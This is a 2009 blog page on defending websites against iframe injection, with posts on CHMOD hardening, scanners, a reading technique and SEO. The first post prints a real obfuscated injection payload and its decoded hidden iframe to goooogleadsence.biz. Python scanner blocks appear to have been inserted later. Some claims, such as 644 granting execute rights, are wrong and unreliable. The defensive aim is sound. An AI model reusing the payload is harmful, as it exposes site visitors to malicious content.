Saturday, October 31, 2009

Obfuscated iFrame Injection Attacks

I have written several popular articles on iframe injections as you will find in this blog.

The people who implemented my suggestions reported that they had quite a bit of success in avoiding these malicious iframe injection attacks. Their websites were now safe and their traffic was continuous.

I had a friend who was a victim of these iframe injection attacks. When I tested his site, all tests indicated that his site was clean, yet I knew this could not be the case. I checked all his index.* files and could not find any obvious hidden iframes. What I did notice was some obfuscated code that my friend had no explanation for.

Obfuscation is the concealment of meaning in communication, making communication confusing, intentionally ambiguous, and more difficult to interpret. It is basically a form of encryption. The web page is not really encrypted, or else the web page would not display when accessed. The web browser can tell the difference between this encrypted code and regular HTML, but the human eye cannot decipher the encrypted code.

Upon further investigation, I found that compromised websites can be infected with hidden iframes and/or with obfuscated (escaped) javascript code. My friend's website appeared to be a victim of this obfuscated iframe injection.

The following was the suspected malicious iframe injection obfuscated code:

[Script Language='Javascript']
[!--
document.write(unescape('%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D'));
//-->
[/Script]

Researching the issue further I found a website that was able to deobfuscate, or decrypt, the code at:

http://www.novirusthanks.org/services/javascript-unescape/

or at:

http://www.patzcatz.com/unescape.htm

What you do is copy only the obfuscated code as shown below:

%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D

You then paste the code into the form box they provide and then click on "Deobfuscate".

The following was the resulting malicious iframe injection code:

[iframe src= http: //goooogleadsence.biz/_click=8F9DA width=1 height=1 style= visibility:hidden;position:absolute ][/iframe]

By completely removing the obfuscated (escaped) javascript code, my friend's website was clean and safe again.
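The escaped string above is plain percent-encoding, so it can be decoded offline instead of pasting it into a web form. The following is an added example, not code from this blog or from the tools it links to: it pulls every unescape() payload out of a page, decodes it, and reports which iframes are hidden, using the same markers as the injection shown above (1-pixel size, visibility:hidden). The sample page, the example.invalid hosts and the display:none check are assumptions made for the illustration.

```python
import re

# JavaScript unescape() decodes %XX and %uXXXX; handle both in a single pass.
ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)
# "[" and "]" are accepted as tag brackets because this blog prints tags that way.
IFRAME = re.compile(r"[<\[]\s*iframe\b([^>\]]*)[>\]]", re.I)
ATTR = re.compile(r"([\w-]+)\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s\"'>\]]+)")

# Constructed sample page: one escaped hidden iframe and one ordinary visible iframe.
SAMPLE_PAGE = (
    "<html><body><p>Welcome</p>\n"
    "<script language='Javascript'>\n"
    "document.write(unescape('%3C%69%66%72%61%6D%65%20src=%22http://example.invalid/x%22"
    "%20width=1%20height=1%20style=%22visibility:hidden;position:absolute%22%3E"
    "%3C%2F%69%66%72%61%6D%65%3E'));\n"
    "</script>\n"
    '<iframe src="https://maps.example.invalid/embed" width="600" height="400"></iframe>\n'
    "</body></html>"
)


def js_unescape(text):
    """Decode %XX and %uXXXX sequences the way JavaScript unescape() does."""
    return ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def decoded_layers(text, max_depth=5):
    """Yield (depth, text): the page itself, then every unescape() payload decoded."""
    queue = [(0, text)]
    while queue:
        depth, current = queue.pop(0)
        yield depth, current
        if depth < max_depth:  # payloads can themselves contain unescape() calls
            for call in UNESCAPE_CALL.finditer(current):
                queue.append((depth + 1, js_unescape(call.group(2))))


def hidden_reasons(attrs):
    """List the attributes that make an iframe invisible to a visitor."""
    reasons = []
    for dim in ("width", "height"):
        value = attrs.get(dim, "").lower().rstrip("px")
        if value.isdigit() and int(value) <= 1:
            reasons.append(f"{dim}={value}")
    style = re.sub(r"\s+", "", attrs.get("style", "").lower())
    for marker in ("visibility:hidden", "display:none"):  # display:none is an added check
        if marker in style:
            reasons.append(marker)
    return reasons


def scan_page(text):
    """Return one finding per iframe, whether written plainly or inside unescape()."""
    findings, seen = [], set()
    for depth, layer in decoded_layers(text):
        for tag in IFRAME.finditer(layer):
            if tag.group(0) in seen:
                continue
            seen.add(tag.group(0))
            attrs = {k.lower(): v.strip("\"'") for k, v in ATTR.findall(tag.group(1))}
            reasons = hidden_reasons(attrs)
            findings.append({
                "src": attrs.get("src", ""),
                "escaped": depth > 0,      # True when found only after decoding
                "hidden": bool(reasons),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    # A literal search sees only the visible iframe; the decoded scan sees both.
    print("literal '<iframe' hits:", SAMPLE_PAGE.lower().count("<iframe"))
    for finding in scan_page(SAMPLE_PAGE):
        print(finding)
```

A finding with both "escaped" and "hidden" set is the pattern described in this post; a visible iframe with a source you recognise is usually legitimate.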

If you implement my suggestions, particularly the CHMOD 444, after an iframe injection attack, and are fairly sure your website is clean, then chances are you may not be a victim of iframe injection obfuscated (escaped) javascript code. One must not forget, though, that no website will ever be 100% secure, which is why we must always practise preventative measures.

It is also important to remember that not all iframes are bad. Before you remove a suspected iframe, make sure it is not relevant to your web page. If you are not certain, you might want to download a copy of the web page before you do any deleting, just to be sure.

Friday, October 30, 2009

Using Your Maximum Concentration

Whenever I am working with my websites, I always put myself into a state of maximum concentration which I learned from my Photoreading course that I had taken. This is very critical when you are implementing changes to your website. You must give it your full concentration or else you could make mistakes that could hinder the operation of your website.

The Tangerine Method

To best read any material, one must first create the relaxed, alert state of body and mind essential for proper reading. When a person is relaxed and alert while reading, he/she is more likely to be faster, more fluent, and less distracted. He/she will be more able to comprehend, retain and recall what is read. One way to do this is to use the "Tangerine Technique".

Using the Tangerine technique, a reader can quickly and easily establish a relaxed state of alertness. It also automatically directs a person's available unit of attention. The result is an immediate improvement in reading skills. The Tangerine technique helps locate and maintain the ideal point of attention for reading.

The Tangerine technique is as follows:

1) Use your hand to reach out in front of you and pick up an imaginary tangerine. Imagine its color, skin texture, and maybe even the sweet, tangy smell. Then, lob it from hand to hand to sense its weight.

2) With your dominant hand, position the imaginary tangerine on the upper-rear portion of your head. Touch that area gently with your hand and imagine the tangerine floating a couple of inches above your head. Bring your hand down and relax your shoulders completely. Pretend this magical tangerine always stays there no matter how your head moves.

3) Close your eyes and let the tangerine balance where you left it. Notice what happens to your physical and mental state as you do this. You will feel relaxed and alert. With your eyes still closed, imagine your field of vision opening up.

4) Maintain the relaxed feeling of alertness as you open your eyes.

By playing with this technique, you will navigate reading material with increased speed and fluency. Your ability to concentrate on the information improves and reading becomes more relaxing. For the first while, you will have to consciously place the tangerine just behind and above the back of your head. Soon it becomes an automatic (unconscious) process so that whenever you approach reading materials, the imaginary tangerine floats into place.

Your Ideal Reading State

Below is an 8-step method for entering your Ideal Reading State before you read any type of reading material. It will help you to better understand and retain the information that you read. It incorporates the tangerine method.

1) Place the reading material in front of you but do not read it yet.

2) Begin to relax by taking a deep breath in and closing your eyes. Become aware of yourself from head to toe. Your spine is erect, your posture is comfortable, and your breathing is relaxed.

3) Mentally state to yourself your purpose for reading. Why are you reading the material? What information do you plan to get out of the material? What is your purpose, your goal for reading this material? Give yourself these positive affirmations.

4) Now enter your ideal state of mind by establishing your point of attention, by mentally placing the tangerine on the top back of your head. Once there, do not worry about keeping it in place. It will stay there by itself.

5) Become aware of yourself as relaxed and alert.

6) Bring a slight hint of smile to the corners of your eyes and the corners of your mouth to relax your face.

7) Imagine your visual field opening up. You have a direct eye mind connection. You do not see one word at a time but many words, or maybe even the whole sentence.

8) Now, at a rate that is comfortable to you, maintaining this state of relaxed alertness, gently open your eyes, and begin reading.

You will be amazed at the results.

Monday, October 19, 2009

Using File Permissions To Combat iFrame Injections

After posting my article on "Measures to Prevent and Detect iFrame Injection Attacks", I started to notice that many other people on the internet were linking to my article. They obviously felt that it was indeed an important weapon for combatting iframe injections.

As my article grew in popularity, I started to notice that iframe injection attacks against my website started to increase. I guess I was making some people very unhappy. As my website is constantly being monitored, I was able to react and remove these iframe injections almost immediately.

It soon occurred to me that perhaps the file permissions on my web pages needed to be beefed up, made more restrictive.

As per my post on "Website Protection and Security Using File and Directory CHMOD", most website file permissions are:

Files: 644
Folders: 755 (with index page in it)
Images: 644
CGI scripts: 755
Php scripts: 644

Since iframe injections attack your index.* webpages, the CHMOD 644 may not be enough to protect them. CHMOD 644 gives you, the user, all read, write and execute permissions and everybody else only read and execute permissions. You would think that this should be enough to prevent an iframe injection. Unfortunately, it is not.

As described in my article "Website Protection Against iFrame Injections", hackers may be attacking your website via a virus that they may have downloaded to your computer without you realizing it. Even though you change passwords and remove the iframes, you may still be vulnerable to iframe injections. This virus could be sneaky enough that the website logs will show that FTP traffic originated from a valid source, with valid FTP credentials. The result will be the same as a user logging into the website, so the attacker will be able to write to (modify) the web page, adding the iframe injection. What we need to do, then, is to prevent writing to the web page. We need to change the web page file permission, or CHMOD value.

The CHMOD capability depends on two conditions:

1) The server you are connected to must support the CHMOD command.
2) You must have access rights to change the attributes of that remote file or directory.

Make sure these two conditions are fulfilled.

It is also important to remember that you can set any non-script file to anything you like. You do not, however, want to set a directory or script to anything but CHMOD 755 if you want it to be able to run (for obvious security reasons). Only the owner of a file or root may change the permissions on a file, no matter what its current permissions may be.

Since the iframe injection attacks are against the index.* web pages, we need to prevent modifications of these web pages. Now suppose you have just finished modifying your index.html and you did not want anybody to update or to delete it. Then, give the web page file permission CHMOD 444 and it will have this effect. This gives everybody, including the owner (user), only read capability. If the owner turns off the write permission, the file is protected from accidental destruction. This is a pretty secure way to store HTML files when they are not being currently edited.

If you set file permission CHMOD 444 via FTP, then you may find that your host does not allow CHMOD 444 to be set via FTP - and even though you think you've changed to 444, it reverts back to 644. You may have to set CHMOD 444 via your host CPanel in a browser. Make sure you check this out. If you entered your site via FTP, edit your index.html file by adding a small change and then removing it. When you try to save the file, you should not be allowed to over-write it.

Once you have changed the file permission to CHMOD 444 on your web page, ensure that it still functions and runs properly. Whenever you need to edit your index.html page, simply change back to CHMOD 644, make your changes, and then change again to CHMOD 444.

Having to change file permissions every time you need to edit a web page might feel a bit tedious. Preventing iframe injections to your website, which could classify you as a risk site by Google and hence stop all traffic to your website, is well worth the extra few minutes needed to edit a web page via the CHMOD command.
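The lock, verify and edit cycle described above can be scripted. The following is an added example, not code from this blog: it assumes a POSIX host where you can run Python against the site's directory (the docroot path is hypothetical), sets every index.* page to 444, re-reads the mode to catch a host that quietly keeps 644, and wraps an edit in a temporary 644 window.

```python
import fnmatch
import os
import stat
import sys
from contextlib import contextmanager

READ_ONLY = 0o444   # r--r--r--  the locked state used in this article
EDITABLE = 0o644    # rw-r--r--  the mode used while a page is being edited
WRITE_BITS = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH


def index_pages(docroot, pattern="index.*"):
    """Yield every index.* file under docroot (hypothetical path to the site files)."""
    for folder, _dirs, files in os.walk(docroot):
        for name in sorted(fnmatch.filter(files, pattern)):
            yield os.path.join(folder, name)


def mode_of(path):
    """Permission bits only, e.g. 0o644."""
    return stat.S_IMODE(os.stat(path).st_mode)


def lock(path):
    """chmod 444, then re-read the mode instead of trusting that the change stuck."""
    os.chmod(path, READ_ONLY)
    return mode_of(path) == READ_ONLY


def lock_site(docroot):
    """Lock every index.* page; return the paths whose mode did not stick."""
    return [path for path in index_pages(docroot) if not lock(path)]


def audit(docroot):
    """Map each index.* page that still has any write bit to its rwx string."""
    return {
        path: stat.filemode(mode_of(path))[1:]
        for path in index_pages(docroot)
        if mode_of(path) & WRITE_BITS
    }


@contextmanager
def editable(path):
    """Open an edit window at 644 and always return the page to 444 afterwards."""
    os.chmod(path, EDITABLE)
    try:
        yield path
    finally:
        if not lock(path):
            raise RuntimeError(f"{path} did not return to 444")


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for failed in lock_site(root):
        print("mode did not stick:", failed)
    # The owner account can always change the mode back, so re-run the audit regularly.
    for path, perms in audit(root).items():
        print("still writable:", perms, path)
```

Running audit() on a schedule shows when a page has been switched back to a writable mode outside one of your own edit windows.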

Thursday, October 15, 2009

Modifications To The iFrame Scanner Tool File

If you have read the article "Measures to Prevent and Detect iFrame Injection Attacks", then these little additions to the "detect-signature.php" iframe scanner file will help give some order to your scanning, especially if you are doing hourly scanning on a 24 hour basis.

The following javascripts were available for free on the internet and I used them for my file, which helped to keep things in perspective.

All these javascripts are to be put between the body tags of the file, [body] and [/body].

Note: Due to Blog restrictions, the normal HTML brackets < > were replaced with [ ].

The following javascript will print the date on the file display web page. Put it right after the [body] tag.


The following javascript will print the time on the file display web page. Put it right after the previous date javascript.
You can also add a "close" button to close the web page after you view it.

If you press the close button, and are using IE 7.0, it will give you a pop up window that says:

"The webpage you are viewing is trying to close the window"

This happens because you opened the window via a hyperlink from a parent window. It is a browser security measure. Basically, if you did not open the window using javascript, you can't close it using javascript.

All you need to do to counteract this is put a javascript code in before the close button script.

Put these codes near the end of the file, just before the [/body] tag.


In case you suffered from an iframe injection attack, you will be able to know, very closely, the date and time of the attack. This is very critical to know if you are to avoid your website being classified as a potential risk site. The sooner you react to the attack, the less the chance of being classified as a malware or badware site by Google.

Tuesday, October 13, 2009

Measures to Prevent and Detect iFrame Injection Attacks

IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. The following is an example of a malicious iframe injection code:

iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden" /iframe

The iframe tag is an HTML tag used to seamlessly embed content from another page or site. (The “i” in “iframe” stands for “invisible”, i.e. “invisible frame”.) IFrames are used on thousands and thousands of sites, because that’s what Google uses for its AdSense ads — the little bit of JavaScript you paste on your page eventually ends up inserting an iframe into the HTML of your page.

Like most useful things, iFrames can be used for good or for bad.

An iframe injection is an injection of one or more iframe tags into a page’s content. The iframe typically does something bad, such as downloading an executable application that contains a virus or worm in it… something that compromises a visitor’s system.

Typically, all your index.* files in your server are infected with a piece of code that loads a hidden iframe in the page. Examples of these pages are:

index.htm
index.html
index.shtml
index.php

The intent of this article is to show what preventative measures you can use to prevent or detect iframe injection attacks to your website.

STEP 1

The first thing you need to do is to check with Google to see if your site is listed as suspicious. You can do this by using the following link:

http://www.google.com/safebrowsing/diagnostic?site=http://yourdomain_name

Before you use the link, you need to replace "yourdomain_name" with your actual website name.

Google will tell you if your website is suspicious or not.

You can also go to the following website and enter your "www.yourdomain_name/". It will advise you on your website status.

http://www.unmaskparasites.com/

STEP 2

If you have suffered an iframe injection attack, you need to act fast. If the security of your website is compromised, it can affect the search engine rankings of your website. Besides, it may pave the way for more sophisticated attacks. Google will mark your site in its search results with a warning: “This site may harm your computer”. If a visitor sees the message “This site may harm your computer” pop up when (s)he tries to access your website/blog, (s)he may not return again and your traffic will go down to zero.

I suggest that you read the article "Website Protection Against iFrame Injections" which you can find in this Blog.

STEP 3

If you have not suffered an iframe injection attack, then you can manually run some scripts which will test the index.* files on your website.

One script you can use is called "clean.php" which you can download at:

http://www.diovo.com/wp-content/uploads/2009/04/clean.php.txt

Copy and paste this script into your text editor, such as notepad, and save the file as "clean.php"

Remember that when you create a web page, it is important to use a pure text editor such as Notepad or an editor designed to create web pages. Never use Word or a word processor to create web pages. The files that word processors create contain formatting codes and other invisible information that can create problems with web servers. Also, when you save the web page, ensure that it has the proper file extension, e.g., index.html, clean.php, etc.

Before you can use the file, you need to change the following line in the script:

$webpath ="Type your domain name here. Eg:http://www.diovo.com/";

which will become:

$webpath ="http://www.yourdomain_name/";

Where "yourdomain_name" is replaced with your actual domain name.

In the script, the "s" parameter specifies the file name to search for and the "c" parameter specifies the text to search for inside the file.

When you have pasted the above script into your notepad editor, made the change for your website name, save it as “clean.php”. Once you have saved the file, upload it to the root directory of your website.

Now you need to create a URL that you will copy and paste into your browser as follows:

http://www.yourdomain_name/clean.php?s=index.php&c=iframe

where "yourdomain_name" is replaced by your actual domain name.

The web page to be checked is given by “s=index.php” and the text to be found is “c=iframe”. This will scan all your files and folders on your website for index.php injections.

Since we also want to check our index.html type web pages, we create a different URL as follows:

http://www.yourdomain_name/clean.php?s=index.html&c=iframe

The file to be checked is given by “s=index.html” and the text to be found is “c=iframe”. This will scan all your files and folders on your website for index.html injections.

The URL will list all the "index.php" or "index.html" files in your website, and if any of the files contains the given string, it will print the part with the string. You can tell that a file is infected because the iframe script is displayed.

Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So you will have to clean the files manually by deleting the iframe script.

You should be able to see that you can use the “s” parameter to test any web page on your website for iframe injection. Simply put in the exact webpage as follows:

s=webpage.ext

You can thus create simple internet URL shortcuts that you can click on to check the required web pages.

When the script tests for iframe injections, it is basically looking for the text "iframe" and so will display any web page that has the text "iframe". You need to ensure that the iframe being displayed is actually a malicious iframe, similar to the example shown previously. Sometimes it may be a legitimate iframe. Be absolutely sure before you delete it from your web page.

The "clean.php" iframe injection tool is quite useful when testing individual pages. However, after your website starts to grow, you will need to have a URL link for every web page extension (ext) which starts to be a time consuming effort, having to check each individual web page for iframe injection.

A website that gives a free script to test all the files on a website for iframe injection is given at the following link:

http://www.websanity.co.uk/blog/2009/08/scan-website-files-for-iframe-injection.html

The file is called "detect-signature.php"

When you have downloaded the file, there are a couple of lines in the script that I suggest you change. This will help make the script more suitable for your website.

Using your notepad editor, open the file. First locate the following line:

define('IGNORE_EXTENSIONS',"jpg pdf zip psd doc gif swf xls"); // Ignore files of these types

You will see that the file will ignore files with extensions jpg, pdf, zip, etc. You can add or delete files as you feel necessary.

Next, locate the following line:

define("IGNORE_BEFORE", strtotime('2009-08-01') );

The file will ignore any web pages created before August 1, 2009. You may want to change this to ensure all your website files are tested. You could simply change 2009 to 2008.

You will be downloading the “detect-signature.php” as a zip file. After download, extract the file. Using the notepad editor, open the file and change the suggested lines to what suits your needs and re-save. Upload the file to the root directory of your website.

To activate, you need to create the following URL for your domain:

http://www.yourdomain_name/detect-signature.php

You can either create a URL short cut or else copy and paste the URL into your browser. Put in your exact domain name for “yourdomain_name”.

When the file is activated, it initially starts by checking every file and web page on your website, unless you have excluded it.

Once the scan is complete, you have two more options you can use for scanning for iframe injection. You can either have the scan stop at the first error (iframe injection) or have it display all errors (all files and web pages with iframe injection). You can continuously click on any of the three links on the web page scan results.

When you do find iframe injections, you need to evaluate if the iframe injection is of the malicious form as indicated previously. If it is, you need to remove it from your web page. Open up your web page with a notepad editor if you have entered your site via FTP, find the iframe injection, delete it and re-save your web page. If you have a complete up-to-date backup of your web page, you can just upload it to your website. It will over-write the web page with the iframe injection.

What I like about this file is that it can check every web page on your website. Although the primary intent is to check all the index.* web pages, checking your other web pages is an added benefit as they might also be attacked. Just make sure that whenever you do find an iframe injection, it is really a malicious iframe.

STEP 4

Having the ability to manually check for iframe injections goes a long way in helping keep your website secure. The final step now is to automate the iframe scanning in case you forget. This will be your constant watch dog.

The best way to do this is to schedule the iframe scanning, say every hour. A nice free System Scheduler can be found at:

http://www.splinterware.com/download/index.htm

Once you have downloaded the System Scheduler, install it. We will schedule the file "detect-signature.php" on your website to run a scan every hour. As mentioned previously, there are three ways to run the file. We can check and display all files, stop at the first error, or check and display errors only. The error is the iframe injection. We will use the 3rd option, so we will need to use the following URL in the System Scheduler:

http://www.yourdomain_name/detect-signature.php?display_errors_only

When the file runs, it will show any iframe infected files. If you see errors, you need to take immediate action.

We will now schedule the file. Open System Scheduler. Select the "Action" menu and then select "New Event". You should now be in the Event dialog box. For Event type you can leave "Run Application". Give the event a title such as "iFrame Injection Scan". In the Application box, input the complete URL to display errors only, with your actual domain name. In "Working Dir" put any directory on your computer. In the "State" box, select Maximized.

We now need to schedule when we want to run the scan. Select the "Schedule" tab. For "Schedule Type", select "Every Hour / Selected Minutes". In the left bottom boxes, select "Every Hour" and "On The Hour". This means the scan will run, e.g. at 1:00 pm, 2:00 pm, 3:00 pm, etc., for the daily 24 hour time frame. Now go to the "Action" menu and Save and Exit. You should see the System Scheduler icon in your right bottom tool bar. This icon must always be displayed in order for the event to run.

Every hour on the hour, your web page will be activated and your website scanned for iframe injections. Look over the results and take action if necessary, otherwise close the web page. If you do not close the page, you will see multiple web pages of the same thing. You simply need to look them over and close them. If you are running the scan constantly over night, you will see the multiple web pages in the morning.

You do not have to run every hour on the hour. You can select what ever time schedule you prefer. If you have been attacked, I strongly recommend you stay with hourly scanning.

To help things be a bit clearer, I added the date and time in the "detect-signature.php" file so I knew the exact date and time the scan was made. You can search the internet for JavaScript that you can add. It is very easy to do and will give order to your scanning.
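The scan described in Steps 3 and 4 can also be run directly against the site's files. The following is an added example, not the code of clean.php or detect-signature.php: it reproduces the behaviour described above (search by file name and text, ignored extensions, a cutoff date, an errors-only view, a timestamp on every run). It assumes it runs where the files are (on the server or on a local copy), uses the file modification time for the cutoff, and goes beyond the single "c" text by also searching for "unescape(" so that escaped payloads are surfaced for review.

```python
import os
import sys
from datetime import datetime

# Values quoted in this article for detect-signature.php; adjust them to your site.
IGNORE_EXTENSIONS = {"jpg", "pdf", "zip", "psd", "doc", "gif", "swf", "xls"}
IGNORE_BEFORE = datetime(2009, 8, 1)
# "unescape(" is an added needle: an escaped payload never contains the text "iframe".
NEEDLES = ("iframe", "unescape(")


def scan(docroot, needles=NEEDLES, only_name=None,
         ignore_ext=IGNORE_EXTENSIONS, ignore_before=IGNORE_BEFORE):
    """Return (checked, hits): checked is a list of relative paths,
    each hit is (relative_path, line_no, needle, snippet)."""
    cutoff = ignore_before.timestamp()
    checked, hits = [], []
    for folder, dirs, files in os.walk(docroot):
        dirs.sort()
        for name in sorted(files):
            path = os.path.join(folder, name)
            ext = os.path.splitext(name)[1].lstrip(".").lower()
            if ext in ignore_ext or (only_name and name != only_name):
                continue
            if os.path.getmtime(path) < cutoff:  # assumption: cutoff applies to mtime
                continue
            rel = os.path.relpath(path, docroot)
            checked.append(rel)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for line_no, line in enumerate(fh, 1):
                    lowered = line.lower()
                    for needle in needles:
                        if needle in lowered:
                            hits.append((rel, line_no, needle, line.strip()[:120]))
    return checked, hits


def report(docroot, errors_only=True, when=None, **scan_args):
    """Render a timestamped text report; errors_only lists nothing but the hits."""
    when = when or datetime.now()
    checked, hits = scan(docroot, **scan_args)
    out = [f"Scan of {docroot} at {when:%Y-%m-%d %H:%M:%S}: "
           f"{len(checked)} files checked, {len(hits)} hits"]
    flagged = {hit[0] for hit in hits}
    if not errors_only:
        out += [f"  ok   {path}" for path in checked if path not in flagged]
    out += [f"  HIT  {path}:{line_no} [{needle}] {snippet}"
            for path, line_no, needle, snippet in hits]
    return "\n".join(out)


if __name__ == "__main__":
    # Example: python scan_site.py /path/to/site   (the script name is hypothetical)
    print(report(sys.argv[1] if len(sys.argv) > 1 else "."))
```

Every hit still needs the manual check described in Step 3, because a text match says nothing about whether the iframe is legitimate.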

STEP 5

If you follow all the measures stated in this document, you will prevent your website from becoming a victim of iframe injection attacks. It is also important to note that your website may not be the only victim. Your home PC may also be a victim. You must also have preventative measures on your PC. Make sure you read the article "Website Protection Against iFrame Injections" as mentioned previously. This is a must.

Website security and monitoring is a vital part of the success of your online business. Making it a priority is crucial for your website file and data protection. Understanding that and taking the steps to properly implement website security practices can mean increased sales and more business opportunities.

Saturday, October 10, 2009

How To Submit Your Blogger Blog To Search Engines

After creating my blogs, I wanted to submit them to the major search engines in the same way as I did with my websites. I wanted to do a complete submission rather than just submit a URL that would have an unknown time for indexing, that is, for being added to the search engine directory.

After submitting my blog, it then had to be verified. This could be done either by inserting a meta tag generated by the search engine webmaster or uploading a generated HTML page to the root directory of the blog. For my websites this was easy to do as I could just FTP to my site or modify my home page. For my blog it was a different matter since I really had no access other than posting, so I thought.

Figuring I was not the only one with this problem, I surfed the net to see if anyone else was in a similar position. What I was able to finally determine was that on Blogger, I actually could modify my template, which in fact was my home page. By figuring out how to do this, I could add the verification meta tag required.

To submit your blog to Google:
Go to: https://www.google.com/accounts/ManageAccount

You first need to create an account if you do not have one.
You then select "Webmaster Tools" to add your website. Use menu on the left of the page.
Click on the "Add a site..." button and then enter the URL of your blog which should be something like:

http://yourblogname.blogspot.com/

Now click on the "Continue" button, and you will be shown what is called a Meta tag. This is shown in the "Verification method" drop down box. If it isn't, select it.

You will see something similar to below:

meta name="google-site-verification" content="IfUqWNCzBwC2qU87G8nGrOoIFq5RTF-Zwel8NTF6rk8"

The meta tag is normally enclosed with <......./>. They have been omitted due to this blog's restriction but are needed.

The whole sentence above is your complete meta tag that you need to add to your blog template.

Now go to your blog and sign-in. You should end up at your Dashboard.
Click on "Layout" and then "Edit HTML" on top of the page. You should now see your home page template.

You will notice at the top that you have the option to download your template before you modify it. It is strongly suggested that you do this just in case something goes wrong.

Go to the HTML code and find the [ head ] tag. Using your keyboard, create a blank line just below this tag.
Now go back to the webmaster page and copy the verification Meta tag completely, including the beginning and ending brackets <, />.

Go back to your template HTML code and paste the verification Meta tag in the blank line you had created. Click on "Save Template" and you are finished.

Finally, go back to the webmaster page and click on the "Verify" button. If all went well, your site should get verified.

To Submit your blog to Yahoo:

Go to: https://siteexplorer.search.yahoo.com/submit

You first need to create a Yahoo ID if you do not have one. You can then add your website.

As was described for Google submission, you will also need to add a Yahoo authentication Meta tag to your blog template. Choose the option "By adding a Meta tag to my home page". As before you will need to copy and paste it.

I found one problem with the Yahoo verification Meta tag when I tried to add it to my template. The Yahoo Meta tag was enclosed with the brackets <, >. To be properly saved in the template the meta tag must be enclosed with the brackets <, /> in order to work properly. The end bracket was not preceded with the / as required.

As before, sign-in to your blog, click "Layout" and then "Edit HTML". Download your template before you modify it.

Locate the tag [ head ]. Using your keyboard, create a blank line below this tag. If you had added the Google verification Meta tag, create the blank line below the Google tag. Copy and paste the Yahoo verification Meta tag in this blank line. Do not forget to add the "/" to the end of the Meta tag bracket so that it becomes />. Save your template and now you are finished.

On your webmaster page click on the "Ready to Authenticate" button. If all goes well, your blog should get authenticated.

By submitting your blogs to Google and Yahoo, you can keep checking your accounts and see when your blog does get indexed. For other search engines, you can follow the same steps as described for Google and Yahoo.

Other Meta Tags

After my submissions to Google and Yahoo, I got to thinking about other Meta tags I could add to my blog template (home page) to help it get better noticed by the search engines.

The following appear to be the most suggested Meta tags that should be used in your template:

- Description META Tag

- Keywords META Tag

When you create these Meta tags, insert them after any Verification or Authentication meta tags you may have added previously.

For help on adding website security, you can visit:

http://www.websiteprotection.net/

If you are disillusioned or struggling with your current internet marketing campaign, you can get help by visiting:

http://www.nichemarketingsecrets.net/

If you want a one-stop solution center with plenty of important and helpful information you can visit:

http://www.schembrionics.com/

Friday, October 9, 2009

Tips on How to Increase Search Engine Page Ranking

Having a website is no guarantee that people will visit, no matter how good your website may be. Your websites presence is very important to your survival. You need to get people to see, or hear about your website. This will increase your credibility and will increase your chances of having these visitors come back and possibly become leads.

The following are some methods that I have used that have put my websites in the first 30 results of search engines such as Google, Yahoo, Bing (MSN), AltaVista and AllTheWeb, even though there was heavy competition with other websites. Website ranking is about your position in the search engine results for a particular keyword.

1. Submit Your Websites To Many Search Engines

You need to get your website indexed on as many search engines as possible. Most often this is free and very easy to do. If you can submit a sitemap with your submission, it will help make things easier. There are many free tools on the internet that will help you create a sitemap that you can submit. Take advantage of this.

The following are links to 3 of the larger search engines. Many smaller search engines use these larger ones so that often, you will automatically be included with these also.

Google: https://www.google.com/accounts/ManageAccount
You first need to create an account. You then select "Webmaster Tools" to add your website. Use the menu on the left of the page. When you have added your site, submit your sitemap under Site Configuration. You will also need to verify your site by either a "META tag" or by uploading a web page to your root directory which is all explained

Yahoo: https://siteexplorer.search.yahoo.com/submit
You first need to create a Yahoo ID. You can then add your website. Use the "Feeds" to submit your sitemap. You will also need to verify your site by either a "META tag" or by uploading a web page to your root directory which is all explained

Bing (MSN): http://www.bing.com/webmaster/
You first need to create a new Windows Live ID. Add your site and also submit your sitemap. You will also need to verify your site by either a "META tag" or by uploading a web page to your root directory which is all explained

Most search engine directories allow you to submit to their website for free. This will allow you to increase your web presence by being listed on another search engine, and it will also be a free link.

It sometimes takes a while before your web pages become indexed, added to the search engine directory.

You can check what pages are indexed by using the following website:

http://www.selfseo.com/search_engines_index_report.php

2. Content

Good content on your web pages is crucial to your website success. When creating your web page content, choose good keywords that relate to your site. Do not add hundreds of keywords or else this may be considered spam. Having about 25 keywords will make your site crawler friendly. Research what keywords people use most often on search engines that pertain to your products or services; use these keywords as text in the design to increase website traffic.

Every 3 months or so, you should make a small change on each web page. Search engines like to see that changes are being made to a site and that it just isn't sitting there for years with no upgrades.

Keep track of your search engine rankings. Once a website is indexed, you should go back and improve pages that didn't get high rankings on key words.

3. Backlinks

To increase page rank rapidly, you have to get as many good quality links (backlinks) to your page that are relevant to the content of your page as you can. There are many ways to get links including, reciprocal linking with other sites, posting on blogs and forums, article marketing, and press releases just to name a few.

